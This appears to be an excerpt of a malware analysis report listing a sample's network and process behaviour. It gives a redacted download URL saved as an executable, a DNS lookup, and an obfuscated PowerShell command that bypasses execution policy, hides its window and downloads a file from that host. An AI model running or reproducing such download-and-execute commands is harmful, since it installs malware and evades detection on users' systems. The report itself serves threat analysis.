Technical Information
- http://www.sa###ffpet.top/user.php?f=##### as %appdata%.exe
- DNS ASK sa###ffpet.top
- '<SYSTEM32>\cmd.exe' /c pow^er^s^heL^l.^eX^e -ex^ecut^iOnPoLIcY bYPass ^-^No^pRo^f^Ile ^-w^indo^w^s^tyL^e^ hi^ddeN^ (^New-^ObJec^t sy^s^tem.N^et.^weB^c^li^e^nt^).^dO^w^nLO^adfILe^('http://www.sa###ffpet....' (with hidden window)